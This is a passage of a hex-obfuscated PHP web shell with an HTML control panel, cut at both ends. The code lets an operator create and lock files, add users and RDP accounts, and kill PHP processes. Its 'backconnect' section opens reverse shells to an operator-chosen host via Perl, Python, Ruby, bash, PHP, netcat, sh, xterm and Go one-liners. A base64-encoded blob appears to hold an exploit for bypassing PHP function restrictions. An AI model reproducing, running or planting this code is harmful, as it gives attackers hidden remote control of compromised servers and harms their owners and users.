\x20\x20\x20\x20  \x20   \x20\x20\x20\x20\$(\x27#\x6do\x64a\x6c-in\x70\x75t\x27)\x2e\x68t\x6d\x6c(\x27\x3ci\x6ep\x75\x74\x20t\x79pe\x3d\x22\x74e\x78t\" \x6e\x61me\x3d\"\x63\x72\x65\x61t\x65_\x66\x6fld\x65\x72\x22\x20c\x6ca\x73s\x3d\x22m\x6f\x64\x61\x6c-\x63\x72e\x61\x74\x65-\x69n\x70\x75\x74\x22\x20\x70\x6c\x61ceh\x6fl\x64\x65r=\x22\x43\x72\x65\x61te Fol\x64er\x22&gt;');\n\x20  \x20      \x20\x20 \x20  eve\x6et.\x70\x72e\x76e\x6etD\x65\x66\x61\x75lt()\x3b\n   \x20\x20\x20\x20\x20\x20  \x20});\n \x20 \x20        \$(\x27\x23\x63\x72e\x61t\x65_f\x69\x6c\x65\x27).cli\x63k(fu\x6ect\x69\x6fn() {\n\x20\x20    \x20       \x20\x20\$('.\x6dod\x61\x6c\x27)\x2es\x68\x6f\x77()\x3b\n\x20  \x20\x20\x20  \x20\x20\x20\x20  \x20 \$(\x27\x23\x6d\x6f\x64al-title\x27).\x68tml('\x3c\x69\x20\x63l\x61s\x73\x3d\"fa-\x73\x6f\x6cid\x20\x66\x61-f\x69\x6c\x65-\x63ir\x63\x6c\x65-\x70lu\x73\x22&gt;\x3c/\x69\x3e\x26\x6e\x62s\x70\x3b\x43\x72\x65at\x65 F\x69\x6c\x65');\n\x20 \x20\x20 \x20 \x20 \x20\x20 \x20\x20\x20 \$('\x23\x6d\x6fd\x61l-inp\x75\x74')\x2e\x68\x74\x6dl(\x27&lt;in\x70\x75t t\x79p\x65\x3d\"te\x78\x74\"\x20nam\x65=\"c\x72eat\x65_f\x69\x6c\x65\x22 c\x6cas\x73=\"mo\x64al-cr\x65\x61\x74\x65-i\x6epu\x74\x22\x20\x70\x6ca\x63eholder=\x22\x43\x72\x65\x61t\x65 \x46\x69\x6ce\"\x3e\x27)\x3b\n\x20 \x20\x20 \x20  \x20\x20\x20\x20  \x20 ev\x65\x6et\x2ep\x72eve\x6etDe\x66\x61ul\x74();\n \x20\x20 \x20\x20\x20     })\x3b\n \x20\x20\x20  \x20\x20\x20\x20\x20\x20\$(\x27#\x6c\x6fc\x6b-fi\x6ce\x27).\x63l\x69\x63k(f\x75n\x63\x74io\x6e()\x20{\n\x20 \x20  \x20\x20\x20  \x20  \x20\x20 \$(\x27.m\x6f\x64\x61\x6c\x27)\x2eshow()\x3b\n\x20\x20  \x20\x20\x20\x20\x20 \x20\x20\x20\x20\x20\x20\$(\x27\x23\x6d\x6f\x64\x61\x6c-\x74\x69\x74\x6ce\x27)\x2e\x68\x74m\x6c('&lt;\x69\x20cla\x73\x73=\"fa-\x73ol\x69d \x66a-lo\x63k\"&gt;\x3c/\x69&gt;&amp;n\x62\x73p;L\x4fC\x4b\x20F\x49\x4cE\x27)\x3b\n\x20 \x20  \x20\x20\x20   \x20\x20\x20 \x20\$(\x27\x23\x6do\x64\x61\x6c-\x69\x6epu\x74').\x68t\x6d\x6c('&lt;\x69\x6ep\x75t \x74yp\x65\x3d\x22te\x78t\x22 \x6ea\x6d\x65=\"\x6c\x6fc\x6b\x66\x69\x6ce\x22 c\x6c\x61ss\x3d\x22\x6dodal-create-in\x70\x75t\x22 \x70lace\x68\x6fld\x65r\x3d\"\x59our\x20Fi\x6c\x65 Na\x6d\x65\"\x3e\x27)\x3b\n\x20   \x20\x20 \x20\x20    \x20\x20\x20e\x76e\x6e\x74.pr\x65\x76en\x74\x44ef\x61\x75\x6ct();\n \x20\x20   \x20 \x20\x20\x20\x20})\x3b\n \x20  \x20\x20     \x20\$('\x23ro\x6f\x74-\x75ser')\x2ec\x6c\x69\x63k(f\x75\x6e\x63\x74\x69\x6fn()\x20{\n\x20\x20  \x20  \x20\x20 \x20\x20  \x20\x20\$('.\x6dod\x61l').\x73ho\x77();\n \x20\x20\x20\x20  \x20\x20\x20     \x20\$('\x23\x6dod\x61\x6c-\x74i\x74\x6ce').\x68tml(\x27\x3ci\x20\x63la\x73s\x3d\x22fa-sol\x69d\x20fa-us\x65\x72-p\x6c\x75s\x22&gt;\x3c/i\x3e&amp;\x6e\x62s\x70;A\x44D\x20USER');\n\x20  \x20   \x20\x20\x20\x20   \x20 \$('\x23\x6do\x64a\x6c-inp\x75t\x27).\x68\x74\x6d\x6c('\x3cin\x70u\x74\x20ty\x70e=\x22\x74e\x78\x74\x22\x20\x6e\x61m\x65\x3d\x22\x61dd-u\x73\x65\x72\x6e\x61\x6de\x22\x20c\x6c\x61\x73\x73\x3d\x22m\x6fd\x61\x6c-\x63\x72\x65a\x74e-\x69n\x70\x75\x74\x22\x20\x70\x6c\x61c\x65\x68o\x6cde\x72=\x22\x55\x73e\x72\x6e\x61me\"\x3e&lt;br&gt;&lt;\x62\x72\x3e&lt;i\x6eput ty\x70\x65\x3d\x22text\" \x6e\x61\x6d\x65=\"\x61\x64d-\x70\x61\x73s\x77\x6f\x72\x64\x22 \x63\x6c\x61s\x73\x3d\x22mo\x64\x61l-c\x72eat\x65-\x69np\x75\x74\x22 pl\x61\x63\x65\x68ol\x64er=\x22Pas\x73\x77\x6frd\x22&gt;');\n \x20\x20\x20 \x20\x20\x20 \x20  \x20 \x20 ev\x65n\x74\x2e\x70\x72e\x76\x65ntD\x65\x66\x61ul\x74()\x3b\n    \x20\x20   \x20  });\n\n\x20\x20\x20    \x20\x20\x20\x20\x20\$(\x27#\x63r\x65at\x65-\x72d\x70\x27).cl\x69ck(\x66un\x63ti\x6fn()\x20{\n     \x20   \x20   \x20  \$('.m\x6fd\x61l\x27)\x2esh\x6fw();\n\x20  \x20   \x20 \x20 \x20\x20 \x20\x20\$(\x27#\x6d\x6fd\x61l-ti\x74\x6c\x65').\x68t\x6dl('::\x20CRE\x41TE \x52\x44P\x27);\n  \x20\x20  \x20\x20  \x20     \$(\x27\x23mo\x64\x61\x6c-\x69\x6epu\x74')\x2eht\x6dl('&lt;i\x6ep\x75\x74\x20t\x79p\x65=\x22\x74\x65\x78\x74\x22\x20name=\x22\x61\x64d-\x72\x64\x70\x22\x20c\x6ca\x73s\x3d\"m\x6f\x64\x61l-cr\x65\x61\x74\x65-\x69\x6eput\x22\x20\x70l\x61ceho\x6cd\x65r\x3d\x22\x55s\x65\x72n\x61m\x65\x22\x3e\x3c\x62r\x3e\x3cb\x72&gt;\x3ci\x6ep\x75t\x20t\x79pe=\x22\x74\x65xt\x22\x20\x6ea\x6de=\"add-r\x64p-\x70\x61s\x73\"\x20cl\x61s\x73=\x22m\x6fd\x61\x6c-cr\x65a\x74e-\x69\x6eput\"\x20\x70\x6c\x61ce\x68\x6flde\x72\x3d\x22Pas\x73wo\x72\x64\x22&gt;\x27);\n\x20 \x20\x20\x20 \x20\x20\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20 \x20\x20  \x65ve\x6e\x74\x2e\x70\x72e\x76en\x74\x44ef\x61ult();\n\x20\x20\x20\x20\x20    \x20  });\n\n \x20  \x20 \x20     \$('\x23c\x6c\x6f\x73\x65-\x6d\x6fd\x61\x6c\x27)\x2ec\x6cic\x6b(\x66u\x6e\x63tion() {\n\x20\x20 \x20 \x20  \x20\x20  \x20  \x20\$('\x2e\x6d\x6f\x64\x61\x6c\x27)\x2eh\x69\x64e();\n   \x20\x20 \x20\x20\x20 \x20\x20\x20\x20\x20 ev\x65nt.p\x72\x65\x76\x65\x6e\x74\x44\x65fa\x75\x6c\x74()\x3b\n\x20\x20   \x20\x20\x20\x20\x20\x20\x20});\n\x20  \x20\x20\x20   \x20\x20 \$('#\x63\x6c\x6f\x73\x65-\x65\x64\x69\x74\x6f\x72\x27)\x2e\x63\x6c\x69ck(f\x75n\x63\x74\x69o\x6e() {\n\x20\x20\x20 \x20\x20  \x20\x20\x20  \x20\x20 \$('.c\x6fde-\x65di\x74o\x72\x27)\x2e\x68i\x64\x65();\n\x20\x20    \x20\x20  \x20 \x20\x20  \x65v\x65n\x74\x2e\x70\x72e\x76ent\x44efault();\n\x20\x20\x20    \x20\x20\x20\x20 })\x3b\n\n\x20\x20\x20 \x20\x20   \x20\x20 \$(\x27\x2ec\x6c\x6f\x73\x65-te\x72\x6din\x61l').\x63l\x69\x63k(f\x75nct\x69\x6f\x6e() {\n \x20\x20\x20 \x20\x20 \x20\x20 \x20\x20\x20 \x20\$('.t\x65\x72m\x69\x6ea\x6c\x27)\x2ehi\x64e();\n \x20\x20\x20\x20  \x20\x20   \x20\x20 \x20event.\x70re\x76\x65\x6e\x74\x44\x65\x66\x61\x75\x6ct()\x3b\n \x20  \x20  \x20\x20\x20\x20\x20})\x3b\n \x20 \x20\x20\x20\x20  \x20 \x20\$('.cl\x6f\x73\x65-bt\x6e-\x73\x27).cl\x69c\x6b(funct\x69\x6fn()\x20{\n   \x20   \x20\x20\x20\x20\x20\x20\x20  \$('.m\x6fd\x61l\x27)\x2ehide()\x3b\n \x20\x20\x20  \x20 \x20\x20\x20\x20    ev\x65\x6et.p\x72even\x74D\x65fau\x6c\x74();\n\x20\x20     \x20\x20\x20  });\n \x20 \x20\x20\x20\x20\x20});\n  \x20 \x3c/scr\x69\x70\x74&gt;\n&lt;/\x62od\x79&gt;\n\n\x3c/html&gt;\n";if(isset($_GET["\x75\x6el\x6fck\x73\x68e\x6c\x6c"])){if(cmd("\x6b\x69lla\x6cl -\x39\x20\x70\x68p")&amp;&amp;cmd("\x70k\x69ll\x20-\x39 \x70h\x70")){success();}else{failed();}}if(isset($_POST["subm\x69\x74-bc"])){${${"GL\x4fBAL\x53"}["q\x6aek\x67qh"]}=$_POST["\x62\x61\x63k\x63\x6fn\x6e\x65ct-hos\x74"];${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6d\x70\x6f\x67\x72\x6eq"]}=$_POST["\x62\x61ck\x63o\x6e\x6ee\x63t-p\x6frt"];if($_POST["g\x65c\x6bo-b\x63"]=="\x70er\x6c"){${"\x47\x4cO\x42\x41\x4cS"}["\x67\x6c\x63\x6a\x63hk\x6f"]="\x50o\x72t\x53\x65\x72ve\x72";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x62\x7a\x71a\x76\x6b\x75v"]="\x48o\x73t\x53e\x72\x76e\x72";echo cmd("\x70\x65\x72\x6c\x20-\x65 'u\x73\x65\x20S\x6f\x63\x6bet;\$\x69\x3d\x22".${${"\x47\x4c\x4fBA\x4c\x53"}["\x70\x62zq\x61vkuv"]}."\"\x3b\$\x70\x3d".${${"GL\x4f\x42\x41\x4cS"}["g\x6c\x63\x6a\x63\x68\x6b\x6f"]}."\x3b\x73o\x63\x6b\x65\x74(\x53,\x50\x46\x5fIN\x45T,SOC\x4b\x5fST\x52E\x41\x4d,ge\x74p\x72o\x74ob\x79\x6ea\x6d\x65(\"t\x63p\x22))\x3bif(con\x6ee\x63\x74(\x53,s\x6fckad\x64r\x5f\x69n(\$p,\x69n\x65\x74\x5f\x61t\x6f\x6e(\$\x69)))){o\x70en(\x53\x54\x44\x49N,\"&gt;\x26S\")\x3b\x6f\x70\x65n(\x53\x54\x44OU\x54,\x22\x3e&amp;S\x22);\x6fpen(S\x54\x44\x45R\x52,\x22\x3e\x26\x53\")\x3b\x65\x78\x65c(\"/\x62in/\x73\x68\x20-\x69\x22);}\x3b\x27");}else if($_POST["\x67\x65c\x6b\x6f-bc"]=="pyt\x68o\x6e"){${"\x47\x4cO\x42\x41L\x53"}["\x75\x70\x6eh\x76\x6d\x73\x73\x77"]="\x48o\x73\x74\x53\x65\x72ver";echo cmd("pyt\x68\x6fn\x20-\x63\x20\x27\x69m\x70o\x72\x74 so\x63k\x65\x74,\x73ubpr\x6fc\x65\x73s,\x6fs\x3b\x73\x3dsocket\x2esock\x65\x74(\x73\x6f\x63ke\x74.\x41\x46_I\x4e\x45T,soc\x6be\x74\x2e\x53O\x43\x4b\x5fS\x54\x52\x45AM)\x3bs\x2eco\x6en\x65c\x74((\x22".${${"\x47\x4c\x4f\x42ALS"}["\x75\x70\x6eh\x76ms\x73w"]}."\x22,".${${"G\x4cOB\x41\x4c\x53"}["m\x70\x6fg\x72n\x71"]}."));\x6fs\x2e\x64up2(s.\x66\x69le\x6eo(),0); os\x2e\x64u\x70\x32(\x73.\x66i\x6cen\x6f(),\x31)\x3b o\x73.d\x75p2(\x73\x2ef\x69\x6c\x65\x6e\x6f(),\x32);\x70\x3d\x73\x75bpr\x6f\x63ess.c\x61\x6c\x6c([\x22/b\x69n/\x73\x68\x22,\x22-\x69\"]);'");}else if($_POST["\x67eck\x6f-b\x63"]=="ru\x62y"){$ffzcwi="\x50\x6fr\x74S\x65\x72v\x65r";echo cmd("\x72\x75\x62y -r\x73o\x63\x6b\x65\x74 -e'\x66=TCPSoc\x6b\x65\x74\x2eo\x70\x65\x6e(\x22".${${"G\x4cO\x42\x41\x4c\x53"}["\x71\x6a\x65k\x67q\x68"]}."\",".${$ffzcwi}.").t\x6f_i\x3be\x78ec sp\x72\x69\x6et\x66(\"/bin/\x73\x68 -\x69 &lt;\x26\x25\x64\x20\x3e\x26\x25\x64\x20\x32\x3e\x26\x25d\",f,f,\x66)'");}else if($_POST["ge\x63ko-bc"]=="bas\x68"){echo cmd("\x62\x61sh\x20-\x69\x20&gt;\x26\x20/de\x76/tcp/".${${"\x47\x4c\x4f\x42\x41LS"}["\x71\x6ae\x6b\x67\x71\x68"]}."/".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x70\x6f\x67\x72\x6e\x71"]}." \x30&gt;&amp;1");}else if($_POST["\x67\x65\x63\x6bo-\x62\x63"]=="\x70h\x70"){${"G\x4c\x4f\x42A\x4cS"}["\x7a\x73tc\x62\x70"]="P\x6f\x72t\x53\x65\x72v\x65\x72";$tmrvmcl="H\x6f\x73\x74S\x65rv\x65r";echo cmd("\x70\x68p -r \x27\$s\x6fc\x6b=f\x73\x6f\x63kope\x6e(\"".${$tmrvmcl}."\x22,".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x7a\x73tc\x62\x70"]}.");\x65\x78ec(\"/\x62i\x6e/\x73h -i\x20\x3c&amp;\x33 &gt;\x26\x33 2\x3e&amp;3\");\x27");}else if($_POST["g\x65ck\x6f-\x62c"]=="\x6e\x63"){$chwdydizo="\x48\x6f\x73tSe\x72\x76e\x72";${"GL\x4f\x42A\x4c\x53"}["\x65\x74\x6e\x6akh\x64\x65\x75"]="P\x6f\x72t\x53e\x72\x76\x65r";echo cmd("\x72\x6d\x20/\x74\x6d\x70/\x66\x3b\x6dk\x66\x69f\x6f /t\x6d\x70/\x66;\x63a\x74 /tmp/f|/\x62\x69n/\x73\x68\x20-\x69 \x32&gt;\x261|\x6e\x63\x20".${$chwdydizo}." ".${${"\x47\x4c\x4f\x42A\x4c\x53"}["etnjk\x68\x64\x65\x75"]}." &gt;/t\x6dp/\x66");}else if($_POST["g\x65ck\x6f-bc"]=="s\x68"){$ltpnspcmmqq="\x50o\x72tS\x65rver";echo cmd("\x73\x68 -\x69 \x3e&amp;\x20/d\x65\x76/\x74c\x70/".${${"GL\x4fBA\x4cS"}["\x71\x6a\x65\x6b\x67\x71\x68"]}."/".${$ltpnspcmmqq}." 0&gt;\x26\x31");}else if($_POST["\x67ecko-bc"]=="\x78\x74erm"){$cerfeumeg="P\x6f\x72\x74\x53\x65rver";echo cmd("xt\x65rm -\x64\x69\x73pl\x61y\x20".${${"\x47\x4c\x4fBALS"}["\x71j\x65\x6b\x67\x71\x68"]}.":".${$cerfeumeg});}else if($_POST["\x67e\x63k\x6f-bc"]=="g\x6f\x6can\x67"){$fvojiwwd="H\x6fs\x74\x53\x65\x72\x76\x65r";echo cmd("\x65\x63\x68\x6f\x20'p\x61ck\x61g\x65 m\x61\x69\x6e;i\x6dpor\x74\"os/\x65x\x65\x63\"\x3bimp\x6f\x72t\x22\x6e\x65t\";fu\x6e\x63\x20\x6da\x69n(){c,\x5f:=\x6eet.\x44\x69al(\x22t\x63\x70\",\"".${$fvojiwwd}.":".${${"\x47\x4cOB\x41LS"}["\x6d\x70o\x67\x72\x6eq"]}."\")\x3bcm\x64:\x3d\x65x\x65\x63\x2e\x43om\x6d\x61n\x64(\x22/\x62\x69\x6e/\x73\x68\x22)\x3b\x63m\x64.S\x74\x64i\x6e\x3d\x63\x3b\x63\x6d\x64\x2e\x53\x74do\x75\x74=c\x3b\x63\x6dd.\x53tderr\x3dc\x3bcmd.\x52un()}\x27\x20\x3e\x20/\x74mp/t\x2e\x67\x6f \x26\x26\x20\x67\x6f r\x75n\x20/\x74mp/\x74.\x67\x6f\x20&amp;&amp;\x20rm /tmp/\x74\x2e\x67\x6f");}}if($_GET["\x74\x65\x72mi\x6e\x61\x6c"]=="byp\x61\x73ser"){$xlinrsrqh="\x66u\x6e\x67\x73i";$nlquijehpkrx="\x66\x75\x6e\x67\x73i";if(!${$nlquijehpkrx}[3](".t\x65\x72m-\x62\x79p\x61\x73s")&amp;&amp;${$xlinrsrqh}[4](${${"\x47L\x4f\x42AL\x53"}["\x68\x67\x75\x61\x6eqdd"]}[0]())){$ufwoetu="\x66\x75\x6eg\x73\x69";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x62\x72v\x6b\x6b\x67"]}="\x50\x44\x39wa\x48\x41KZn\x56uY3R\x70\x6224\x67cHduKC\x52\x6ab\x57R\x6b\x4bS\x42\x37\x43\x69A\x67\x49C\x42\x6eb\x479iY\x57w\x67\x4aG\x46\x69\x59\x79\x77\x67\x4a\x47\x68l\x62\x48\x42l\x63i\x77\x67\x4a\x47Jh\x592t\x30\x63\x6dF\x6aZ\x54s\x4b\x43\x69Ag\x49CB\x6abG\x46zc\x79\x42W\x64Wx\x75IHs\x4bICAgI\x43\x41\x67IC\x42w\x64WJ\x73\x61\x57\x4dg\x4a\x47E7\x43iA\x67ICA\x67\x49C\x41gcH\x56i\x62\x47ljI\x47Z\x31bm\x4e0\x61W9\x75I\x469\x66\x5aG\x56\x7a\x64\x48J\x31\x59\x33\x51o\x4bS\x42\x37\x49\x41og\x49CA\x67\x49\x43AgICAgI\x43BnbG9i\x59WwgJG\x4a\x68\x59\x32t\x30cmFjZT\x73\x67\x43\x69Ag\x49CA\x67\x49C\x41gIC\x41g\x49H\x56\x75\x63\x32V\x30\x4b\x43\x520\x61\x47l\x7a\x4cT5\x68KT\x73\x4bI\x43A\x67ICAgIC\x41gI\x43\x41gJ\x47\x4a\x68\x59\x32t0c\x6dF\x6a\x5aSA9\x49C\x68u\x5aXc\x67\x52Xhj\x5aXB0\x61\x579\x75\x4b\x53\x30+\x5a\x32V0VH\x4ahY\x32\x55o\x4b\x54\x73gIyA\x37K\x51\x6f\x67\x49CAg\x49CAg\x49\x43\x41\x67ICB\x70Z\x69g\x68aX\x4ezZXQoJG\x4a\x68\x592\x740\x63mF\x6a\x5aV\x73x\x58\x56\x73n\x59\x58\x4an\x63y\x64dK\x53\x6bgey\x41jIF\x42IUC\x41+PS\x413\x4c\x6aQKIC\x41\x67I\x43Ag\x49CA\x67IC\x41\x67ICAg\x49\x43\x52\x69\x59WN\x72d\x48\x4a\x68Y\x32\x55\x67PS\x42\x6bZ\x57\x4a\x31Z\x319\x69\x59\x57\x4erd\x48J\x68Y2\x55oK\x54\x73K\x49\x43Ag\x49\x43AgIC\x41g\x49CAg\x66\x51ogI\x43\x41gIC\x41gI\x480\x4b\x49CAgIH\x30\x4bCi\x41\x67\x49\x43Bj\x62G\x46z\x63y\x42IZ\x57x\x77\x5a\x58I\x67\x65wogI\x43\x41g\x49CA\x67I\x48\x421Y\x6d\x78p\x59\x79\x41\x6b\x59Sw\x67\x4aG\x49\x73\x49\x43R\x6a\x4cCAk\x5a\x44sKICA\x67IH0\x4bC\x69Ag\x49CB\x6dd\x57\x35\x6a\x64\x47lv\x62i\x42\x7adHIy\x63\x48R\x79KCY\x6b\x633RyLC\x41kcCA9\x49D\x41\x73\x49CRzI\x44\x30gO\x43k\x67ewo\x67\x49CAg\x49\x43\x41\x67\x49C\x52\x68Z\x47\x52y\x5a\x58NzID\x30\x67M\x44sKIC\x41gIC\x41\x67\x49C\x42\x6d\x623I\x6fJGo\x67\x50\x53Ak\x63y\x30\x78\x4fy\x41ka\x69\x41+PS\x41\x77Oy\x41\x6ba\x690t\x4b\x53\x42\x37\x43i\x41\x67I\x43A\x67I\x43A\x67ICAg\x49\x43\x52h\x5a\x47RyZX\x4ezI\x44w\x38PSA4\x4f\x77\x6fgI\x43\x41g\x49CA\x67I\x43\x41\x67\x49\x43A\x6bY\x57\x52\x6bc\x6d\x56\x7acyB8PSB\x76c\x6d\x51\x6fJ\x48\x4e0\x63l\x73\x6bc\x43\x73ka\x6c0\x70Ow\x6f\x67\x49\x43A\x67ICAgI\x480\x4b\x49C\x41\x67IC\x41gIC\x42\x79Z\x58\x521c\x6d4\x67J\x47\x46\x6b\x5a\x48Jlc3\x4d7C\x69\x41\x67\x49\x43\x429CgogI\x43\x41gZnVu\x593\x52\x70b\x324g\x63H\x52\x79M\x6eN\x30c\x69g\x6bcHRyLCAkbSA\x39\x49\x44g\x70I\x48\x73K\x49\x43\x41g\x49\x43Ag\x49\x43Ak\x623V\x30\x49\x440\x67\x49\x69\x497C\x69\x41gICA\x67ICAg\x5a\x6d\x39y\x49C\x67ka\x54\x30\x77OyAk\x61\x53\x418\x49\x43\x52\x74\x4fyA\x6baS\x73r\x4b\x53B\x37Ci\x41g\x49\x43AgICA\x67IC\x41\x67I\x43R\x76dXQ\x67\x4c\x6a\x30\x67\x59\x32\x68y\x4b\x43\x52\x77dHI\x67J\x69A\x77e\x47Z\x6dK\x54s\x4b\x49\x43Ag\x49CA\x67IC\x41g\x49\x43\x41g\x4a\x48\x420\x63i\x41+P\x6a0g\x4f\x44\x73KICA\x67\x49CAgICB\x39\x43\x69\x41\x67\x49\x43\x41\x67ICA\x67c\x6dV0\x64\x58\x4a\x75IC\x52\x76\x64X\x51\x37C\x69Ag\x49C\x429C\x67\x6f\x67I\x43\x41\x67ZnV\x75\x59\x33\x52\x70b24gd3\x4a\x70dG\x55\x6fJ\x69RzdHI\x73\x49\x43\x52\x77LCA\x6b\x64i\x77g\x4a\x474\x67\x50\x53\x41\x34\x4bS\x42\x37C\x69\x41gIC\x41\x67I\x43AgJ\x47\x6b\x67\x50\x53Aw\x4fwogICAg\x49\x43\x41\x67IGZvcig\x6b\x61S\x41\x39\x49D\x417I\x43Rp\x49\x44w\x67J\x474\x37\x49C\x52\x70\x4b\x79\x73\x70I\x48sKI\x43AgICA\x67IC\x41\x67I\x43\x41\x67\x4a\x48N\x30\x63l\x73\x6b\x63C\x41\x72\x49C\x52pXS\x419I\x47\x4e\x6fc\x69gkdiAm\x49\x44\x42\x34Z\x6d\x59\x70Ow\x6f\x67\x49\x43A\x67IC\x41\x67I\x43AgIC\x41kdi\x41+\x50\x6a0gOD\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\x4b\x49CA\x67\x49\x43\x41g\x49C\x42\x39C\x69\x41\x67IC\x429C\x67o\x67\x49C\x41g\x5a\x6eV\x75Y\x33\x52p\x6224\x67bGVh\x61\x79\x67kYWR\x6b\x63iwgJH\x41g\x50\x53A\x77\x4c\x43\x41kc\x79\x41\x39\x49D\x67\x70I\x48\x73\x4b\x49C\x41\x67\x49CAg\x49\x43B\x6e\x62G\x39iYW\x77gJ\x47\x46\x69Y\x79wg\x4aGh\x6c\x62HBl\x63\x6a\x73KI\x43A\x67IC\x41g\x49C\x42\x33\x63\x6d\x6c0Z\x53gkY\x57J\x6aLCA\x77e\x44Y\x34\x4c\x43Ak\x59\x57\x52\x6bciA\x72IC\x52wI\x43\x30\x67\x4d\x48\x67\x78MC\x6b7\x43\x69AgICAg\x49\x43\x41g\x4aG\x78\x6cY\x57s\x67\x50\x53\x42\x7adH\x4a\x73\x5aW\x34\x6f\x4a\x47\x68l\x62\x48\x42\x6cc\x69\x30+\x59\x53k7C\x69\x41\x67\x49\x43A\x67\x49\x43A\x67aW\x59\x6fJH\x4dg\x49\x540\x67OCk\x67\x65yAk\x62\x47\x56\x68\x61\x79AlPS\x41yI\x44\x778\x49\x43\x67\x6b\x63\x79\x41\x71\x49\x44g\x70IC\x30g\x4dTs\x67\x66\x51o\x67I\x43AgICAgIH\x4a\x6cd\x48\x56ybi\x41kb\x47\x56ha\x7asKI\x43\x41\x67\x49\x48\x30KCi\x41gI\x43\x42mdW\x35\x6a\x64\x47l\x76\x62\x69\x42w\x59\x58\x4a\x7aZ\x56\x39\x6c\x62G\x59oJ\x47J\x68\x632U\x70\x49\x48\x73\x4bI\x43\x41\x67I\x43A\x67IC\x41k\x5a\x569\x30\x65XB\x6cID0\x67bG\x56h\x61\x79\x67kYm\x46zZ\x53w\x67\x4d\x48gx\x4d\x43\x77\x67M\x69\x6b\x37\x43gogIC\x41\x67IC\x41\x67I\x43R\x6cX3\x42\x6fb2Z\x6d\x49\x44\x30gbG\x56\x68ayg\x6bY\x6dFz\x5aS\x77\x67\x4dH\x67yMCk7\x43\x69AgI\x43\x41gI\x43\x41\x67\x4aG\x56f\x63\x47\x68\x6cbn\x52za\x58pl\x49D0\x67\x62\x47\x56ha\x79\x67\x6bYmF\x7a\x5a\x53\x77g\x4d\x48\x67zNiwg\x4d\x69\x6b\x37C\x69\x41\x67\x49\x43\x41g\x49CA\x67\x4a\x47\x56\x66cG\x68\x75\x64\x57\x30gP\x53\x42sZ\x57\x46rK\x43\x52iY\x58\x4elLC\x41weDM4\x4cCAyKT\x73K\x43\x69\x41gIC\x41g\x49C\x41\x67\x5am9\x79KCR\x70\x49\x44\x30gMDs\x67JG\x6b\x67P\x43A\x6bZV9\x77\x61\x47\x35\x31\x62Ts\x67\x4a\x47kr\x4b\x79\x6bgew\x6f\x67I\x43A\x67\x49CAgI\x43\x41g\x49\x43A\x6baG\x56\x68\x5a\x47\x56\x79I\x44\x30g\x4a\x47\x4a\x68c2\x55g\x4byA\x6bZ\x569\x77\x61\x47\x39\x6d\x5ai\x41\x72I\x43Rp\x49\x43o\x67\x4a\x47\x56\x66cG\x68l\x62\x6eR\x7a\x61\x58\x70l\x4f\x77o\x67I\x43A\x67I\x43\x41g\x49\x43\x41\x67ICA\x6b\x63F\x390e\x58BlI\x43A\x39I\x47xl\x59\x57\x73\x6f\x4aG\x68lY\x57\x52lc\x69w\x67\x4dC\x77g\x4e\x43\x6b7\x43\x69\x41gI\x43AgI\x43\x41\x67IC\x41\x67I\x43Rw\x582\x5as\x59Wdz\x49D\x30\x67b\x47V\x68\x61y\x67k\x61\x47V\x68Z\x47Vy\x4cC\x410\x4cCA0KTsK\x49CAgIC\x41gICAg\x49CAgJH\x42\x66dm\x46k\x5aH\x49g\x50\x53Bs\x5a\x57Fr\x4b\x43\x52\x6f\x5aWFkZXIsIDB4\x4dT\x41\x70O\x77\x6f\x67ICA\x67\x49\x43A\x67\x49\x43\x41g\x49\x43\x41kc\x46\x39tZ\x57\x31\x7aei\x419IG\x78l\x59Wso\x4a\x47\x68l\x59\x57Rl\x63\x69\x77\x67\x4d\x48\x67y\x4f\x43\x6b\x37Cg\x6fg\x49C\x41gICA\x67\x49\x43\x41\x67I\x43BpZ\x69\x67\x6b\x63F\x39\x30e\x58\x42l\x49D09\x49\x44Eg\x4ai\x59\x67\x4aH\x42\x66\x5a\x6d\x78hZ\x33M\x67P\x54\x30\x67Ni\x6b\x67\x65\x79\x41jI\x46\x42\x55X\x30xP\x51U\x51\x73IFBGX1J\x6c\x59W\x52\x66\x563J\x70d\x47U\x4b\x49C\x41g\x49C\x41\x67\x49\x43\x41gI\x43A\x67\x49\x43\x41g\x49C\x4d\x67\x61\x47\x46uZG\x78l\x49H\x42\x70Z\x51\x6f\x67\x49\x43\x41\x67\x49C\x41g\x49\x43\x41gIC\x41gIC\x41\x67JGRhdGF\x66YWRk\x63iA\x39\x49\x43\x52lX3R\x35\x63\x47\x55gPT\x30g\x4d\x69\x41/\x49\x43\x52\x77X3ZhZG\x52\x79\x49\x44o\x67JGJh\x632UgK\x79\x41\x6b\x63F\x39\x32YW\x52kc\x6asKIC\x41g\x49C\x41gI\x43\x41\x67\x49CA\x67\x49C\x41g\x49\x43RkYX\x52\x68X3\x4e\x70\x65\x6dU\x67PSAk\x63\x469tZ\x571zejs\x4bI\x43A\x67\x49\x43\x41\x67\x49CAg\x49\x43\x41g\x66S\x42lb\x48Nl\x49Gl\x6d\x4bCRw\x583R5cGUgP\x540\x67M\x53A\x6d\x4a\x69\x41\x6bc\x469m\x62\x47\x46\x6e\x63\x79A9\x50S\x411\x4b\x53B\x37\x49C\x4dgU\x46R\x66TE9\x42\x52\x43w\x67UEZ\x66U\x6dVh\x5a\x469le\x47Vj\x43\x69\x41\x67I\x43Ag\x49\x43AgICAg\x49CAg\x49C\x41k\x64\x47V\x34dF9zaXpl\x49D\x30\x67JHB\x66b\x57Vt\x63\x33\x6f7CiA\x67ICAg\x49CAgI\x43A\x67\x49H\x30\x4bI\x43AgIC\x41\x67IC\x429Cg\x6fg\x49C\x41\x67\x49\x43\x41gIGlmK\x43E\x6b\x5a\x47F0\x59V\x39\x68Z\x47\x52\x79\x49\x48x\x38I\x43\x45kd\x47\x564\x64\x46\x39\x7a\x61\x58\x70\x6cIHx\x38\x49\x43EkZGF0\x59\x56\x39z\x61X\x70lK\x51o\x67\x49C\x41gIC\x41g\x49\x43AgICB\x79\x5a\x58\x521cm4g\x5a\x6dFsc\x32U\x37C\x67og\x49\x43A\x67I\x43Ag\x49HJ\x6c\x64H\x56y\x62\x69\x42bJG\x52hdG\x46\x66\x59WRkci\x77\x67\x4a\x48\x52l\x65\x48\x52fc2\x6c\x36\x5a\x53\x77\x67\x4aG\x52\x68dG\x46f\x632l6ZV07CiAgI\x43B9C\x67\x6f\x67ICA\x67Zn\x56u\x593R\x70b